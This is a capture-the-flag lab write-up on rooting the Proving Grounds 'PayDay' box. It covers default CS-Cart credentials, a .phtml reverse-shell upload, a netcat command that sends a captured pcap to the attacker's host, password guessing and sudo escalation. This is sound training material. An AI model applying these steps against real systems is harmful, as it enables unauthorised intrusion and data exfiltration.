PayDay

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

  • The usual autorecon revealed several open ports:

    • SSH (22)

    • HTTP (80)

    • POP3 (110)

    • SMB (139 & 445)

    • 993

    • 995

Service Analysis

  • I began by exploring HTTP (80) and discovered a cs-cart application. A simple login using the default credentials (admin:admin) granted immediate access.

  • I started looking for CVEs and I found, EDB ID: 48891 (No CVE ID). It was quite simple, the application allowed file uploads as templates, any PHP file could be uploaded if given a ".phtml" extension. This opened the door to remote code execution.

Exploit Steps

Gaining Initial Access

  • I crafted a reverse shell script, renamed it with the .phtml extension, and uploaded it. By navigating to:

http://192.168.192.39/skins/shell.phtml
Gaining Access
  • I quickly obtained shell access. Once inside, I uploaded linpeas.sh for further enumeration.

  • Linpeas.sh revealed access to the root directory, although the existing .ssh/authorized_keys were not in a valid format and I couldn’t write new ones.

authorized_keys
  • A file of interest was capture.cap. I utilized a neat file transfer method using netcat:

cat capture.cap | netcat 192.168.45.201 1234
nc -l -p 1234 -q 1 > capture.cap < /dev/null
Transferring the pcap File
  • After analyzing the pcap with Wireshark, I uncovered credentials for a user: brett:ilovesecuritytoo. But wait, there’s no user named Brett here! Tried patrick:ilovesecuritytoo and root:ilovesecuritytoo. Nope.

Password Exposed
Spraying the Password
  • Then I found database creds in a PHP config: root:root.

db_password
MySQL Database Enumeration
  • Logged into MySQL, dumped the cscart database, and found, admin:admin and customer:customer. Seeing a pattern here? Yeah, me neither.

Users Hashed Passwords
Cracked Password
  • After banging my head against the wall, I looked out for hints, turns out it's just patrick:patrick. The password was literally the username. Take a moment. Breathe. Let that sink in.

Privilege Escalation

  • After switching to the patrick account, I ran:

sudo -l
  • This revealed that I could run any command as root without a password. A quick execution of:

sudo bash
  • provided a root shell, completing the takeover.

Getting Root

Lessons Learned

  • Password Guessing 101: Never underestimate username:username combos, they’re tragically common.

  • Sudo -l Is Golden: Always check sudo permissions. This box handed root on a silver platter.

  • PCAPs Hide Secrets: Network captures often leak credentials, even if they’re for non-existent users.

  • Template Uploads = Shells: If an app lets you upload "templates," abuse it .phtml bypasses are clutch.

Last updated